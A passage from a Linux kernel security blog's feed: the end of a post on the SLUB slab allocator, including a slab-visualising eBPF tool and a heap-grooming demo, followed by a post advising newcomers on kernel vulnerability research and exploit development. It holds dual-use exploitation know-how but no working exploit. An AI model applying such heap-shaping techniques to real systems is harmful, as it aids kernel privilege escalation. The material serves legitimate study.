</span></span><span class="line"><span class="cl">  name = 0xffffffff8297cb4c &#34;kmalloc-512&#34;,
</span></span></code></pre></div><p>And voila! We cast the value returned by <code>kmalloc_slab()</code> as a <code>kmem_cache</code> and just like that we can view the members. We can see the name is indeed <code>kmalloc-512</code> as we hypothesised and we can also see some of the other fields we touched on :)</p>
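<p>The rounding we just watched in the debugger can be sketched in a few lines. This is a simplified model, not the kernel&rsquo;s actual lookup: the size list is an assumption based on the general purpose caches you&rsquo;d typically see on an x86_64 SLUB system (note the odd-ones-out 96 and 192), and <code>kmalloc_cache_size()</code> is a made-up helper name. The upper bound mirrors the <code>cmp rdi,0x2000</code> check in the disassembly above.</p>

```python
import bisect

# Assumed general purpose cache sizes (typical x86_64 SLUB config), smallest first.
KMALLOC_SIZES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192]


def kmalloc_cache_size(size):
    """Return the object size of the smallest cache that fits `size`.

    Returns None for requests bigger than the largest cache, which take a
    different path in the kernel. Zero-sized requests are special-cased by
    the kernel and are not modelled here.
    """
    idx = bisect.bisect_left(KMALLOC_SIZES, size)  # first cache size that is not smaller than `size`
    if idx == len(KMALLOC_SIZES):
        return None
    return KMALLOC_SIZES[idx]


# The 0x108 (264) byte request from the backtrace above.
print(kmalloc_cache_size(0x108))
```

<p>A 264 byte request skips past 256 and lands on the next size up, matching the <code>kmalloc-512</code> cache we saw in <code>$rax</code>.</p>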
<p>Anyway, hopefully that was a fun little demo on how you can reinforce your understanding with a little exploration in the debugger.</p>
<p>I also wanted to highlight <a href="https://github.com/osandov/drgn"><code>drgn</code></a> as another debugger to tinker with, which lets you do live introspection &amp; debugging on your kernel. It&rsquo;s written in Python and is very programmable, however I couldn&rsquo;t get it to find some symbols for this particular demo.</p>
<h4 id="slxbtrace-ebpf">slxbtrace (ebpf)</h4>
<p><img src="https://sam4k.com/content/images/2022/11/exited_dance.gif" alt=""></p>
<p>Now for the grand reveal, the real reason behind this 5,000 word (yikes) post &hellip; a cool little tool I&rsquo;ve been working on for visualising slub allocations :D</p>
<p>Well, this could very well already be a thing, but I&rsquo;d been sleeping on ebpf for far too long and this seemed like a fun way to explore the tooling.</p>
<p>Without going too much into the ebpf implementation (another post, maybe?!), <code>slxbtrace</code>[3] lets you specify a specific cache size and visualise the cache state. In particular you can highlight allocations from particular call sites, making it a neat tool for helping with heap feng shui during exploit development.</p>
<p><img src="https://sam4k.com/content/images/2022/11/slxbtrace_demo.gif" alt=""></p>
<p>pls excuse the flickering&hellip; my fault for using linux</p>
<p>Let me explain what on earth is going on here. So, <code>slxbtrace</code> will basically hook and process calls to <code>kmalloc()</code> and <code>kfree()</code> and show you what&rsquo;s where in a cache.</p>
<p>So far it&rsquo;s pretty naive: when you run it, it has no knowledge of the cache state. However, once it starts catching <code>kmalloc()</code>s it can build up an idea of where the slabs are (as they&rsquo;re page aligned) and the objects in them.</p>
<p>Each known slab is visualised. We can see the slab address on the left, and then the objects in the slab as they&rsquo;d sit in memory:</p>
<ul>
<li><code>?</code> means <code>slxbtrace</code> doesn&rsquo;t know the state of this object</li>
<li><code>-</code> represents a free object</li>
<li><code>x</code> represents a misc allocation</li>
<li><code>0...</code> we can then tag specific allocations so they&rsquo;re easy to visualise</li>
</ul>
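<p>To make the bookkeeping a bit more concrete, here&rsquo;s a rough userspace sketch of the idea described above. To be clear, this is not the actual <code>slxbtrace</code> code: the function names are hypothetical, the addresses are made up, and it assumes single-page, page-aligned slabs of 32 byte objects.</p>

```python
PAGE_SIZE = 4096
OBJ_SIZE = 32  # assumption: tracking a 32 byte cache

slabs = {}  # slab base address -> list of per-object state characters


def _slot(addr):
    # Assumes each slab is a single page, so rounding down finds its base.
    base = addr - (addr % PAGE_SIZE)
    # A slab we have not seen before starts out fully unknown ('?').
    row = slabs.setdefault(base, ["?"] * (PAGE_SIZE // OBJ_SIZE))
    return row, (addr - base) // OBJ_SIZE


def on_kmalloc(addr, tag="x"):
    """Record an allocation; `tag` marks call sites we care about."""
    row, idx = _slot(addr)
    row[idx] = tag


def on_kfree(addr):
    """Record a free."""
    row, idx = _slot(addr)
    row[idx] = "-"


def render():
    """One line per known slab: base address, then the object states."""
    return [f"{base:#x} " + "".join(row) for base, row in sorted(slabs.items())]


# Made-up event stream: a tagged allocation, a misc one, then a free.
on_kmalloc(0xffff888100042000, tag="0")
on_kmalloc(0xffff888100042020)
on_kfree(0xffff888100042000)
print(render()[0])
```

<p>Slots only leave the <code>?</code> state once an event touches them, which is why the picture starts out mostly unknown and fills in over time.</p>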
<p>So what&rsquo;s going on in this demo?! Well I am tracking the state of the <code>kmalloc-cg-32</code> cache with <code>slxbtrace</code> on the left, while I run a program which triggers a bunch of kmallocations on the right (<code>kmalloc32-fengshui</code>). This program:</p>
<ol>
<li>Triggers 800 allocations of <code>struct seq_operations</code>, whose allocations are tracked as <code>|0|</code>, to fill up some slabs!</li>
<li>Frees every other <code>struct seq_operations</code> after the first 400, effectively trying to make some holes (denoted by <code>|-|</code>) in the slabs we just filled up</li>
<li>Next I allocate a bunch of <code>struct msg_msgseg</code>s of the same size (denoted by <code>|1|</code>), trying to land them next to my <code>struct seq_operations</code> in memory :D</li>
<li>Finally I cleanup everything and free it all :)</li>
</ol>
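<p>The layout those steps are aiming for can be sketched with a toy model. This deliberately ignores how SLUB really picks a free object (per-CPU slabs, freelist ordering, randomisation and so on) and simply assumes every new allocation reclaims one of the holes; the slot list is purely illustrative.</p>

```python
# Toy model only: each list entry is one object slot, in allocation order.
slots = ["0"] * 800                    # 1. spray 800 seq_operations

for i in range(400, 800, 2):           # 2. free every other one after the first 400
    slots[i] = "-"

holes = [i for i, s in enumerate(slots) if s == "-"]
for i in holes:                        # 3. assumption: each msg_msgseg reclaims a hole
    slots[i] = "1"

# Peek at the boundary between the untouched and the interleaved region.
print("".join(slots[396:408]))
```

<p>In the ideal case every <code>1</code> ends up with a <code>0</code> as a neighbour, which is the adjacency the real program is trying to coax out of the allocator.</p>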
<p>Right now this is just a very, very barebones poc and likely has some issues, but I thought it would be neat to share here as it demonstrates some of the stuff we&rsquo;ve touched on.</p>
<p>I will absolutely share all this on my github though, once it&rsquo;s in a shareable state, just in case anyone else is also interested in playing around!</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab</a></li>
<li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging">https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging</a></li>
<li>not the final name, probably</li>
</ol>
<h3 id="wrapping-up">Wrapping Up</h3>
<p><img src="https://sam4k.com/content/images/2022/11/we_survived.gif" alt=""></p>
<p>Is this&hellip; did we&hellip; is it over? This one really turned into an absolute leviathan, but perhaps that&rsquo;s just a testament to the work that&rsquo;s gone into the kernel&rsquo;s slab allocator!</p>
<p>In this post we covered an integral part of the kernel&rsquo;s memory management subsystem: the slab allocator. Specifically, we looked at the SLUB implementation which is the de facto implementation on modern systems (bar embedded stuff).</p>
<p>We really lived up to the Linux internals namesake in this post, as we dived in and explored the SLUB allocator from all angles: the underpinning data structures, the API used by the rest of the kernel and then validated this all with some introspection.</p>
<p>Hopefully this provided a reasonably holistic insight into slab allocators, with opportunities for further reading/exploration readily available.</p>
<p>Also worth noting we kept things pretty shiny as we looked primarily at the latest (at the time of starting) kernel release, v6.0.6!</p>
<p>I was going to expand a bit on SLAB and SLOB, but to be honest we&rsquo;re almost at 6000 words and it&rsquo;s probably out of scope for my aims for this series, but just in case:</p>
<ul>
<li>SLAB was the previous default implementation (it hasn&rsquo;t been the default for around 14 years) and the tl;dr is it was more complex than SLUB and less friendly to modern multi-core systems <a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a></li>
<li>SLOB was introduced ~2005 and aimed at embedded devices, trying to keep things as compact as possible to make the most of less memory <a href="https://lwn.net/Articles/157944/">[2]</a></li>
</ul>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li>
<li><a href="https://lwn.net/Articles/157944/">https://lwn.net/Articles/157944/</a></li>
</ol>
<h2 id="next-time">Next Time!</h2>
<p><img src="https://sam4k.com/content/images/2022/11/still_here.gif" alt=""></p>
<p>Well, to be honest, as far as &ldquo;<strong>Memory Allocators</strong>&rdquo; goes as a topic, we&rsquo;ve done pretty well between our coverage on the buddy and slab allocators.</p>
<p>I&rsquo;m not entirely sure there will be a next time for this mini series, I might hop back onto the virtual memory stuff and look into the lower level implementation there.</p>
<p>That said, if I were to explore the memory allocator space more I&rsquo;d want to cover the security side of things: memory allocators in the context of exploit techniques and mitigations. If that&rsquo;s something you&rsquo;d be into, feel free to let me know :)</p>
<p>Otherwise: thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>So You Wanna Pwn The Kernel?</title><description>My aim for this post is to provide some insights for getting into Linux kernel vulnerability research and exploit development</description><link>https://sam4k.com/so-you-wanna-pwn-the-kernel/</link><guid isPermaLink="false">6308337592020209c38fb0fa</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Thu, 01 Sep 2022 14:07:40 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/08/confused_girl.gif" medium="image"/><content:encoded><![CDATA[<p>Initially I was going to write the next instalment of the Linternals: Virtual Memory series after getting back from <a href="https://conference.hitb.org/hitbsecconf2022sin/">HITB2022SIN</a>, but after a number of offline and online conversations it seems like this could help a number of you out, so let&rsquo;s give it a go!</p>
<p>My aim for this post is to provide some insights into getting into Linux kernel <strong>v</strong>ulnerability <strong>r</strong>esearch and <strong>e</strong>xploit <strong>d</strong>evelopment (VRED), although I&rsquo;m sure some of this will be transferable to similar areas.[1]</p>
<p>Sounds fairly straightforward, right? Well, much like the process of writing a kernel exploit, diving into this can also be open-ended and confusing. There are many approaches and a wealth of resources out there, with no clearly defined path to follow.</p>
<p>Is this post going to pave that clearly defined path? Probably not. We all learn in different ways, have different experiences, motivations and goals. Hopefully, however, I can help demystify this topic a bit for you and give you the tools necessary to pave the right path for you.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#mindset">Mindset</a>
<ul>
<li><a href="#motivation">Motivation</a></li>
<li><a href="#curiosity">Curiosity</a></li>
<li><a href="#perseverance">Perseverance</a></li>
<li><a href="#ego">Ego</a></li>
</ul>
</li>
<li><a href="#approaches">Approaches</a>
<ul>
<li><a href="#reading">Reading</a></li>
<li><a href="#videos">Videos</a></li>
<li><a href="#projects">Projects</a></li>
</ul>
</li>
<li><a href="#workflow">Workflow</a>
<ul>
<li><a href="#tooling">Tooling</a></li>
<li><a href="#organisation">Organisation</a></li>
<li><a href="#staying-up-to-date">Staying Up-To-Date</a></li>
<li><a href="#having-a-gameplan">Having a Gameplan</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a>
<ul>
<li><a href="#ctfs">CTFs</a></li>
<li><a href="#reading-materials">Reading Materials</a></li>
<li><a href="#tools">Tools</a></li>
<li><a href="#video-materials">Video Materials</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<hr>
<ol>
<li>For a more general post on demystifying security research, I absolutely recommend a post of the same title by <a href="https://twitter.com/alexjplaskett">Alex Plaskett</a> <a href="https://alexplaskett.github.io/demystifying-security-research-part1/">here</a>, which touches on similar themes</li>
</ol>
<h2 id="overview">Overview</h2>
<p>As I mentioned above, linux vred is a complex and constantly evolving topic. So as you might imagine, trying to write an accessible, usable introduction to this topic has its own challenges. But we gotta try!</p>
<p>The first thing I want to cover is <strong>mindset</strong>. Yeah, I get it, sounds wishy-washy and inactionable, but I think it will help to talk a bit about some useful mindset tips for approaching work like this and avoiding burnout.</p>
<p>Then I&rsquo;ll move onto talking about <strong>approaches</strong> you can take to begin your journey down the rabbit hole that is linux vred and hone your skills. Again, worth highlighting here that these are just suggestions from my experiences and are non-exhaustive.</p>
<p>I&rsquo;ll briefly touch on my <strong>workflow</strong> and some of the tooling I find useful, again this is really personal preference, but may be helpful as a starting point. Plus I always find it interesting to hear what cool tools and workflows other people use!</p>
<p>Finally I&rsquo;ll wrap things up with a list of <strong>resources</strong>, this will be far from exhaustive as well, but hopefully I&rsquo;ll get a decent amount of stuff in there!</p>
<p><img src="https://sam4k.com/content/images/2022/08/we_got_this.gif" alt=""></p>
<h2 id="mindset">Mindset</h2>
<h3 id="motivation">Motivation</h3>
<p>At risk of sounding like one of those YouTube motivational speakers, one of the first things you want to understand is your motivation for getting into this.</p>
<p>💡</p>
<p>Do you love understanding things and then breaking them? Do you use Linux daily and finally want to get back at it? Do you want to pivot from exploiting a different platform? Did you watch the movie Blackhat (2015)? Do you want a new hobby to keep you up till 4am?</p>
<p>Whatever your motivation, it&rsquo;s important to go into this with the understanding that this is a long journey, you (probably) won&rsquo;t be pwning kernels overnight! In fact, you&rsquo;ll never understand everything. There will be many &ldquo;failures&rdquo; and hurdles along the way.</p>
<p>But that&rsquo;s okay! Actually, it&rsquo;s more than okay, that means you&rsquo;re (probably) doing it right! Though, I&rsquo;d be lying if I said this cycle of learning and &ldquo;failure&rdquo; with the occasional success wasn&rsquo;t a magnet for burnout and motivational humps.</p>
<p>However, by understanding your motivations and goals, as well as what you&rsquo;re getting into, these motivational humps can be more manageable and infrequent.</p>
<p>In terms of managing these humps, try where possible to prioritise working on things you enjoy and are interested in. Not only will it be better for your mental health, but you&rsquo;ll also likely find yourself more productive.</p>
<p>Due to the open-ended and exploratory nature of vred, you&rsquo;re not gonna have a good time trying to innovate and seek out solutions if you&rsquo;re completely unmotivated to do so. For the same reason, having some structure and milestones associated with tasks also helps prevent feelings of aimless drifting or getting overwhelmed.</p>
<p>Like I said though, these humps aren&rsquo;t always avoidable and are managed differently by different people, so I won&rsquo;t pretend to know the answers. For example, a common recommendation, and one I use, is to remember to context switch!</p>
<p>If you&rsquo;ve been bashing your head against the keyboard for some months, neck-deep in C source code trying to find a particular primitive, sometimes it can help to take a pause. Go write that Python tool you&rsquo;ve been meaning to. No, you won&rsquo;t forget everything. In fact, you may come back with a fresh perspective and clear mind.</p>
<h3 id="curiosity">Curiosity</h3>
<p><img src="https://sam4k.com/content/images/2022/08/piqued_interest.gif" alt=""></p>
<p>Curiosity may have killed the cat, but it&rsquo;s a security researcher&rsquo;s best friend. Especially starting out, it can be tempting to rush to popping that shell.</p>
<p>Trust me, I&rsquo;ve been guilty of it many a time. You&rsquo;re just starting out and trying a kernel CTF and you just want to get that flag to prove you can do it, right? So you Google some techniques and you copy and paste some code, tweak some stuff and keep iterating until you get it.</p>
<p>But as Emerson said, &ldquo;It&rsquo;s not the destination, it&rsquo;s the journey&rdquo;. More important than popping the shell, is understanding how you popped it. The former may be a win here, but it&rsquo;s that deeper understanding which will net you future wins.</p>
<p>Be curious! Ask questions! Take your time. If you don&rsquo;t quite understand this technique you&rsquo;ve seen, spend some time playing around with it until you do. If something isn&rsquo;t working, spend some time getting to the root cause rather than jumping straight to another approach.</p>
<p>This fundamental understanding you&rsquo;ll develop by being curious is a lot more flexible and applicable to future projects than a surface level awareness of potential techniques or approaches.</p>
<h3 id="perseverance">Perseverance</h3>
<p><img src="https://sam4k.com/content/images/2022/08/frustrated.gif" alt=""></p>
<p>I&rsquo;ve touched on this a few times now: kernel VRED is both complex and open-ended. Not only is there no clear path to winning, sometimes there is no path at all.</p>
<p>There might not be a bug in that module you&rsquo;ve been looking at or a way to elevate your privileges with that heap overflow. Again, that&rsquo;s okay, it&rsquo;s normal!</p>
<p>Being able to persevere in the face of regular hurdles and dead-ends is key. An important aspect of this is defining &ldquo;success&rdquo; and &ldquo;failure&rdquo;. I&rsquo;ve thrown the F word around a few times so far, and been mindful to put it in quotes.</p>
<p>Just because you&rsquo;ve spent months searching for a bug in a kernel module and come up with nothing, doesn&rsquo;t mean you&rsquo;ve failed. During that time you&rsquo;ve likely deepened your understanding of the kernel, improved your workflow, come up with tooling etc.</p>
<p>All of these are things which can help you &ldquo;win&rdquo; going forward, so yes while perseverance is key when you hit these roadblocks and dead-ends, also try not to just see them as failures!</p>
<p>It&rsquo;s also worth noting, the flip side of this is knowing when to call it quits. Later, in the workflow section, I talk about having a gameplan for approaching vred tasks, such that when you&rsquo;ve exhausted your gameplan, you know it&rsquo;s time to move on.</p>
<h3 id="ego">Ego</h3>
<p><img src="https://sam4k.com/content/images/2022/08/got_no_idea.gif" alt=""></p>
<blockquote>
<p>&ldquo;your idea or opinion of yourself, especially your feeling of your own importance and ability&rdquo; - Cambridge Dictionary on &ldquo;ego&rdquo;</p>
</blockquote>
<p>Ego plays a big role in our industry, and fortunately is something that is spoken about more these days. And no I&rsquo;m not talking about inflated egos (yet), but <a href="https://www.dictionary.com/browse/impostor-syndrome#:~:text=noun%20Psychology.,luck%20or%20other%20external%20forces.">imposter syndrome</a>.</p>
<p>In the beginning, you may come into this field finding things extremely daunting and overwhelming. After all, the kernel is huge and complicated and there&rsquo;s so many super smart people out there publishing some amazing work!</p>
<p>For many of us, this feeling never goes away. Myself included! I recently did my first conference talk at HITB2022SIN, and I was anxious for weeks in the build up despite the topic being something I worked on for months and was super familiar with.</p>
<p>Part of this was to do with public speaking, but part was worrying about the quality and validity of my work in the eyes of peers. What if it was all horribly wrong?!</p>
<p>So this section is just to reassure you that if you feel this, it&rsquo;s okay, you&rsquo;re not alone! While this is common, try not to let it get on top of you! My main advice here would be that the only person you should be comparing yourself with is yourself a year or so ago[1] :)</p>
<p>The flip side to this, of course, is that I think it&rsquo;s good to maintain a level of humility. This is a field that is constantly evolving and you&rsquo;ll never know it all. Furthermore, due to the complexity of some of this stuff, you might not have a complete understanding. This is all okay, just be open, and happy even, to adjust that understanding.</p>
<hr>
<ol>
<li>Totally arbitrary number of course, as you may have taken a break and been working in other areas, but you get the gist of what I mean</li>
</ol>
<h2 id="approaches">Approaches</h2>
<p><img src="https://sam4k.com/content/images/2022/08/sausage_hands.gif" alt=""></p>
<p>Alright, let&rsquo;s move onto some hands-on advice! Hopefully now I&rsquo;ve instilled some of the mindset involved in getting into kernel vred stuff, time to put it to good use!</p>
<p>As has been a running theme here, there&rsquo;s many different approaches to get stuck into this and we all approach learning in different ways. I&rsquo;ve tried to provide a variety of options here, though this is far from an exhaustive list.</p>
<p>Feel free to experiment, mix-and-match and see what works best for you! To throw in my 10 cents: I have found hands-on projects by far the best method to develop a working understanding of new stuff, supplementing this with some reading.</p>
<h3 id="reading">Reading</h3>
<p>Okay, so the bread-and-butter for learning about kernel vred stuff is going to be reading; there&rsquo;s a wealth of blog posts and publications out there on a range of topics.</p>
<p><img src="https://sam4k.com/content/images/2022/09/head_tv.gif" alt=""></p>
<p>Not sure what else to say about this, other than that the hardest part here is curating and finding these readings. Contributors range from hobbyists to professional and academic researchers, all being hosted in different places by different people.</p>
<p>Beyond the customary &ldquo;use Twitter&rdquo; for your infosec needs, I&rsquo;ve also included a link in the resources below to a great repo called <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a> maintained by <a href="https://twitter.com/andreyknvl">@andreyknvl</a> which contains a pretty thorough list of reading materials.</p>
<p>Coming into this, the amount of material out there may be overwhelming. I&rsquo;d just suggest starting with stuff immediately relevant to what you&rsquo;re working on/interested in. E.g. if you want to try to write a local priv esc, then read some recent LPE write-ups.</p>
<p>Also remember <strong>curiosity</strong> and <strong>perseverance</strong>. Some/most/all of this stuff may be utter gibberish at first, and that&rsquo;s fine. Especially with VRED write-ups, each bug and exploit will have its own specific nuances which will be foreign to even experienced folks reading them for the first time.</p>
<p>Just remember to take your time to pause and follow up each bit you don&rsquo;t understand, even if it leads you down another rabbit hole, until you can piece it together.</p>
<p>Also another disclaimer that not everyone who takes the time to share their work is a NYT best seller, graphics designer or native English speaker!</p>
<h3 id="videos">Videos</h3>
<p>If you&rsquo;re more of a visual learner, the options are a bit more limited but not non-existent. Besides my GIFs and occasional diagrams, there are a reasonable number of recorded conference talks available on YouTube.</p>
<p><img src="https://sam4k.com/content/images/2022/09/tv_popcorn.gif" alt=""></p>
<p>Again, the problem here becomes trying to find which conferences to check out for content, because some of these may not index well and may not have a tonne of views. In the <strong>Resources</strong> section below, I&rsquo;ll include a list of con channels to get you started.</p>
<p>I&rsquo;m sure there are probably some great content creators out there pumping out videos, but as that&rsquo;s not my preferred media I&rsquo;m afraid I can&rsquo;t help much there. If you know of any I can plug here who make vids on Linternals / VRED then @ me pls.</p>
<h3 id="projects">Projects</h3>
<p>I feel like theory can only get you so far and if you&rsquo;re interested in doing some kernel vred, you&rsquo;re going to need to get your hands dirty at some point anyway!</p>
<p>By getting hands-on, you&rsquo;re able to put into practice the techniques and understanding you&rsquo;ve gained from your research. Furthermore, sometimes the best way to understand something in the kernel is to get in the debugger and take a peek yourself.</p>
<p>However, it&rsquo;s one thing to be told &ldquo;just get some hands on experience!&rdquo; and another to actually know where to start, especially if you&rsquo;re completely new to this.</p>
<p><img src="https://sam4k.com/content/images/2022/09/not_sure_where_to_start.gif" alt=""></p>
<p>As a result, I&rsquo;ll include some ideas and starting points for potential projects here. You&rsquo;ll find the more you get into things, the more ideas you&rsquo;ll have for your own tooling or experiments as you go on:</p>
<ol>
<li>A core part of kernel vred is, of course, understanding the kernel, so one project idea could be to try and write your own kernel driver and play around with some features (reading input from userspace via IOCTLs, allocating memory etc.)</li>
<li>Follow along with exploit write-ups! Find a local privilege escalation write-up you like (maybe with source available) and try to follow along and get it running in a VM; again taking the time to understand the how&rsquo;s and why&rsquo;s of what&rsquo;s going on</li>
<li>Taking this a step further, you could try the above without source or even without a write-up by looking at some CVE&rsquo;s. Alternatively, piggy-backing off of idea 1 you could write your own vulnerable driver and exploit that :)</li>
<li>CTFs are of course another popular way to test your kernel vred mettle, and I&rsquo;ll provide some links in the resources to some below.</li>
<li>Tooling! Writing tooling to improve your kernel vred workflow or even just to explore kernel internals can be a great way to develop that fundamental understanding. Don&rsquo;t worry if you don&rsquo;t have ideas right now, trust me you will!</li>
<li>Posting your own write-ups or analysis! When I started this blog, I actually never intended for anyone to see it, it was just a way to motivate myself to look into various topics and refine my understanding on them via writing accessible posts</li>
</ol>
<h2 id="workflow">Workflow</h2>
<p>Now onto the less glamorous, but just as fundamental part: workflow. I appreciate this is highly preference based, so this is more for reference and because I also find it interesting to hear about other people&rsquo;s workflows.</p>
<p><img src="https://sam4k.com/content/images/2022/09/behold_my_stuff.gif" alt=""></p>
<p>Your workflow is something that will likely constantly evolve, refined over an iterative process of discovering new tools and deeper understanding of your own preferences, strengths and weaknesses. Don&rsquo;t be afraid to try new things! :)</p>
<h3 id="tooling">Tooling</h3>
<p>For my <strong>IDE</strong>, I use &ldquo;a configuration framework for <a href="https://www.gnu.org/software/emacs/">GNU Emacs</a>&rdquo; called <a href="https://github.com/doomemacs/doomemacs">Doom</a>. It&rsquo;s very easy to set up (and tweak) and the default settings are pretty good. I actually found this project thanks to a great talk, &ldquo;<a href="https://www.youtube.com/watch?v=heib48KG-YQ&amp;ab_channel=linux.conf.au">Kernel Hacking Like It&rsquo;s 2020</a>&rdquo; by Russell Currey.</p>
<p>If you&rsquo;re interested in finding out more about Doom Emacs, there&rsquo;s <a href="https://www.youtube.com/playlist?list=PLhXZp00uXBk4np17N39WvB80zgxlZfVwj">a cool playlist</a> on YouTube to get you started by <a href="https://www.youtube.com/c/ZaisteProgramming">Zaiste Programming</a>.</p>
<p>Another cornerstone of my workflow is <strong>virtualisation</strong>. Whenever I&rsquo;m writing up a new exploit or doing some testing, I&rsquo;ll be spinning up a representative target VM[1]. My tool of choice here is <a href="https://www.qemu.org">QEMU</a>; I find it to be lightweight and very flexible (and it&rsquo;s free and open-source!).  </p>
<p>The last part of the tooling trifecta for me: the <strong>debugger</strong>. Perhaps unsurprisingly I&rsquo;m regularly neck-deep in <a href="https://www.google.com/search?q=gdb&amp;sourceid=chrome&amp;ie=UTF-8">gdb</a>[2]. Despite being quite literally older than me, it still holds up. That said, addons like <a href="https://github.com/hugsy">hugsy</a>&rsquo;s <a href="https://github.com/hugsy/gef">GEF</a> (GDB Enhanced Features) make life easier.</p>
<h3 id="organisation">Organisation</h3>
<p><img src="https://sam4k.com/content/images/2022/09/deaf.gif" alt=""></p>
<p>AKA Documentation. Yep, I said it. But no, I&rsquo;m not talking about carefully curated and margin-tweaked executive reports or several hundred page long technical specifications.</p>
<p>I can&rsquo;t stress enough how much future you will thank yourself if you get into the habit of documenting your work early on. It doesn&rsquo;t have to be anything fancy, I just use markdown + git. Just make sure there&rsquo;s some semblance of order and that it&rsquo;s going to be easy for you to hunt down and refer back to later.</p>
<p>You will accumulate <em><strong>a lot</strong></em> of knowledge during your research and you won&rsquo;t be able to retain all of it, nor will all of it be immediately useful. But having it neatly documented and easy to reference means that when you have to go back to it, you can. It also just helps to reinforce knowledge and understanding too.</p>
<p>Whether it&rsquo;s coming back to a kernel module you&rsquo;ve previously done work on and want a refresher, or if you found a heap shaping primitive in a previous CTF that would be a perfect fit for the one you&rsquo;re working on now - having notes to refer back to is a life saver.</p>
<h3 id="staying-up-to-date">Staying Up-To-Date</h3>
<p>Another useful part of your workflow to consider is keeping up-to-date with the latest kernel gossip. It seems like every week there&rsquo;s a new write-up or poc dropping and it can be a lot to keep up with, especially when they&rsquo;re from all over the place.</p>
<p><img src="https://sam4k.com/content/images/2022/09/gossip.gif" alt=""></p>
<p>When I first asked a colleague how they found all these papers and write-ups, they replied Twitter and I scoffed. Surely not? But lo and behold, several years later I can confirm Twitter is still probably the best means to find this kind of content. It is what it is.</p>
<p>Alternatively of course, you can try to curate your own feed (e.g. via RSS or Atom) from the sources themselves and use a reader to catch updates.</p>
<p>Another source beyond blogs and news sites is of course mailing lists. Yep, they&rsquo;re still a thing. The one I mainly keep an eye on is <a href="https://www.openwall.com/lists/oss-security/2022/08/">oss-security</a> which is where you&rsquo;ll find public disclosures for linux kernel stuff if they went through the CVD process.</p>
<p>Furthermore, if you want to get granular and you&rsquo;re looking for specific information don&rsquo;t be afraid to dive into commit history or the lkml.</p>
<h3 id="having-a-gameplan">Having a Gameplan</h3>
<p>We&rsquo;re almost there, I promise! The last, but certainly not the least, aspect of the workflow I want to talk about is having a gameplan for approaching vred projects.</p>
<p>Whether it&rsquo;s vulnerability research or exploit development, we&rsquo;re dealing with inherently complex and open-ended problems, which may have no solution at all.</p>
<p>By approaching these problems with a structured methodology, we&rsquo;re able to break down what can seem a daunting and overwhelming task into manageable chunks. Also, if we get to the end of it and don&rsquo;t find that bug or pop that shell, we at least know we&rsquo;ve tried our best and can take what we&rsquo;ve learned and move onto the next task.</p>
<p><img src="https://sam4k.com/content/images/2022/09/gameplan.gif" alt=""></p>
<p>So instead of just diving into the problem and following each lead, I&rsquo;d recommend figuring out a gameplan that works for you and trying to approach these problems in an ordered, methodical way.</p>
<p>Again, this is something that will vary from person to person, depending on how you work. It will also likely evolve over time as you do more of this kind of work, and that&rsquo;s okay :)</p>
<p>For more concrete examples, I talk about this in my talk &ldquo;E’rybody Gettin’ TIPC: Demystifying Remote Linux Kernel Exploitation&rdquo;. The recording isn&rsquo;t up yet, but you can see the slides <a href="https://conference.hitb.org/hitbsecconf2022sin/materials/D1T1%20-%20Erybody%20Gettin%20TIPC%20-%20Demystifying%20Remote%20Linux%20Kernel%20Exploitation%20-%20Sam%20Page.pdf">here</a>.</p>
<hr>
<ol>
<li><a href="https://sam4k.com/setting-up-a-virtualised-linux-empire-on-apple-silicon/">Setting Up A Virtualised (Linux) Empire on Apple Silicon</a></li>
<li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">Patching, Instrumenting &amp; Debugging Linux Kernel Modules</a></li>
</ol>
<h2 id="resources">Resources</h2>
<p>I&rsquo;m already 3000 words deep so this resources section will be a work in progress and is far from exhaustive. If you have additions, feel free to @ me or DM me and I&rsquo;ll get them in.</p>
<h3 id="ctfs">CTFs</h3>
<ul>
<li><a href="https://ctf.hackthebox.com">HTB</a> has some kernel pwn challenges to practice your skills with</li>
<li><a href="https://github.com/smallkirby">smallkirby</a>/<a href="https://github.com/smallkirby/kernelpwn">kernelpwn</a> seems like a decent curation of some kernel pwn challenges, with a section for beginners too :)</li>
</ul>
<h3 id="reading-materials">Reading Materials</h3>
<ul>
<li>No need to reinvent the wheel, absolutely check out the awesome repo <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a>, maintained by <a href="https://twitter.com/andreyknvl">@andreyknvl</a>, containing a wealth of papers and write-ups</li>
<li><a href="https://0xax.gitbooks.io/linux-insides/content/">linux-insides</a> by <a href="https://twitter.com/0xAX">0xAX</a> is a great low-level dive into some linux internals and was an inspiration for my own <a href="https://sam4k.com/linternals-introduction/">linternals</a> series :)</li>
<li><a href="https://lwn.net">LWN.net</a></li>
<li><a href="https://github.com/sam4k">sam4k</a>/<a href="https://github.com/sam4k/linux-kernel-resources">linux-kernel-resources</a> is my attempt to curate some useful kernel tidbits related to compiling, debugging, instrumenting and patching the linux kernel</li>
</ul>
<h3 id="tools">Tools</h3>
<ul>
<li><a href="https://elixir.bootlin.com/linux/latest/source">bootlin&rsquo;s Elixir cross referencer for linux source</a>; great for browsing different kernel versions with references &amp; defs in the browser</li>
<li><a href="https://github.com/doomemacs/doomemacs">Doom Emacs</a>, my current IDE setup</li>
<li><a href="https://github.com/hugsy">hugsy</a>/<a href="https://github.com/hugsy/gef">gef</a> (GDB Enhanced Features), an addon for GDB to improve RE/xdev workflow</li>
</ul>
